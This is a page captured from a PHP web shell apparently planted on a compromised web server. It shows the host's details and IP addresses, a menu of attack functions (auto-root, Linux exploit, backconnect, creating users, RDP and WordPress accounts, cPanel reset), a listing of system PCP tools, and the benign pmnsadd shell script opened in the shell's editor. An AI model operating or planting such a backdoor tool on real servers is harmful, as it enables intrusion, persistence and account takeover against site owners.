Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
pcp /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
discover
[ DIR ]
drwxr-xr-x
chkhelp
16.28
KB
-rwxr-xr-x
find-filter
11.86
KB
-rwxr-xr-x
install-sh
9.06
KB
-rwxr-xr-x
mkaf
2.82
KB
-rwxr-xr-x
newhelp
20.84
KB
-rwxr-xr-x
pcp-atop
300.56
KB
-rwxr-xr-x
pcp-atopsar
300.56
KB
-rwxr-xr-x
pcp-dmcache
7.13
KB
-rwxr-xr-x
pcp-dstat
70.37
KB
-rwxr-xr-x
pcp-free
9.78
KB
-rwxr-xr-x
pcp-htop
257.34
KB
-rwxr-xr-x
pcp-iostat
20.78
KB
-rwxr-xr-x
pcp-ipcs
6.82
KB
-rwxr-xr-x
pcp-lvmcache
7.13
KB
-rwxr-xr-x
pcp-mpstat
29.08
KB
-rwxr-xr-x
pcp-numastat
6.33
KB
-rwxr-xr-x
pcp-pidstat
49.64
KB
-rwxr-xr-x
pcp-python
925
B
-rwxr-xr-x
pcp-shping
3.47
KB
-rwxr-xr-x
pcp-ss
17.38
KB
-rwxr-xr-x
pcp-summary
11.21
KB
-rwxr-xr-x
pcp-tapestat
18.38
KB
-rwxr-xr-x
pcp-uptime
4.89
KB
-rwxr-xr-x
pcp-verify
7.72
KB
-rwxr-xr-x
pcp-vmstat
1.54
KB
-rwxr-xr-x
pmcd
119.19
KB
-rwxr-xr-x
pmcd_wait
12.77
KB
-rwxr-xr-x
pmconfig
12.91
KB
-rwxr-xr-x
pmcpp
24.88
KB
-rwxr-xr-x
pmfind_check
4.7
KB
-rwxr-xr-x
pmgetopt
21.68
KB
-rwxr-xr-x
pmhostname
12.23
KB
-rwxr-xr-x
pmie_check
21.05
KB
-rwxr-xr-x
pmie_daily
13.92
KB
-rwxr-xr-x
pmie_dump_stats
11.87
KB
-rwxr-xr-x
pmie_email
1.76
KB
-rwxr-xr-x
pmie_farm
896
B
-rwxr-xr-x
pmiestatus
11.83
KB
-rwxr-xr-x
pmlock
11.83
KB
-rwxr-xr-x
pmlogconf
54.48
KB
-rwxr-xr-x
pmlogextract
70.02
KB
-rwxr-xr-x
pmlogger
143.2
KB
-rwxr-xr-x
pmlogger_check
28.14
KB
-rwxr-xr-x
pmlogger_daily
43.11
KB
-rwxr-xr-x
pmlogger_farm
919
B
-rwxr-xr-x
pmlogger_merge
6.66
KB
-rwxr-xr-x
pmlogger_rewrite
8
KB
-rwxr-xr-x
pmlogreduce
33.19
KB
-rwxr-xr-x
pmlogrewrite
146.09
KB
-rwxr-xr-x
pmnewlog
810
B
-rwxr-xr-x
pmnsadd
2.89
KB
-rwxr-xr-x
pmnsdel
16.83
KB
-rwxr-xr-x
pmnsmerge
17.02
KB
-rwxr-xr-x
pmpause
12.37
KB
-rwxr-xr-x
pmpost
16.33
KB
-rwxr-xr-x
pmproxy
140.98
KB
-rwxr-xr-x
pmsignal
2.72
KB
-rwxr-xr-x
pmsleep
12.37
KB
-rwxr-xr-x
pmwtf
7.63
KB
-rwxr-xr-x
telnet-probe
11.84
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pmnsadd
#!/bin/sh # # Copyright (c) 1997-2001 Silicon Graphics, Inc. All Rights Reserved. # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 2 of the License, or (at your # option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License # for more details. # # Add a subtree of new names into the namespace in the current directory # # source the PCP configuration environment variables . $PCP_DIR/etc/pcp.env umask 22 # anything else is pretty silly exitsts=1 tmp=`mktemp -d $PCP_TMPFILE_DIR/pmnsadd.XXXXXXXXX` || exit 1 prog=`basename $0` trap "rm -rf $tmp; exit \$exitsts" 0 1 2 3 15 _usage() { echo "Usage: pmnsadd [-d] [-n namespace] file" } namespace=${PMNS_DEFAULT-$PCP_VAR_DIR/pmns/root} while getopts dn:\? c do case $c in d) echo "$prog: Warning: -d deprecated, duplicate PMNS names allowed by default" ;; n) namespace=$OPTARG ;; \?) _usage exitsts=0 exit ;; esac done shift `expr $OPTIND - 1` if [ $# -ne 1 ] then _usage exit fi if [ ! -f $namespace ] then echo "$prog: cannot find PMNS file \"$root\"" exit fi if [ ! -w $namespace ] then echo "$prog: cannot open PMNS file \"$root\" for writing" exit fi if [ ! -f "$1" ] then echo "$prog: cannot find input file \"$1\"" exit fi if grep '^root {' "$1" >/dev/null then # Special case ... if the PMDA only supplies metrics at the root of # the PMNS, e.g. the MMV PMDA with all dynamic metrics, the input # PMNS contains 'root {' already, so just use that without any need # to construct the upper levels of the PMNS # cp "$1" $tmp/tmp else # Normal case ... find PMNS pathname for base of new subtree # (subroot), construct upper levels of PMNS as required and hand-off # to pmnsmerge # subroot=`$PCP_AWK_PROG <"$1" 'NF >= 2 && $2 == "{" { print $1 ; exit }'` echo 'root {' >$tmp/tmp path="" for name in `echo "$subroot" | tr '.' ' '` do [ ! -z "$path" ] && echo "$path {" >>$tmp/tmp echo " $name" >>$tmp/tmp echo "}" >>$tmp/tmp if [ -z "$path" ] then path="$name" else path="$path.$name" fi done cat "$1" >>$tmp/tmp fi # try to preserve mode, owner and group for the new output files # rm -f $namespace.new [ -f $namespace ] && cp -p $namespace $namespace.new $PCP_BINADM_DIR/pmnsmerge -f $namespace $tmp/tmp $namespace.new exitsts=$? # from here on, ignore SIGINT, SIGHUP and SIGTERM to protect # the integrity of the new ouput files # trap "" 1 2 15 if [ $exitsts = 0 ] then mv $namespace.new $namespace else echo "$prog: No changes have been made to the PMNS file \"$namespace\"" rm -f $namespace.new fi
Close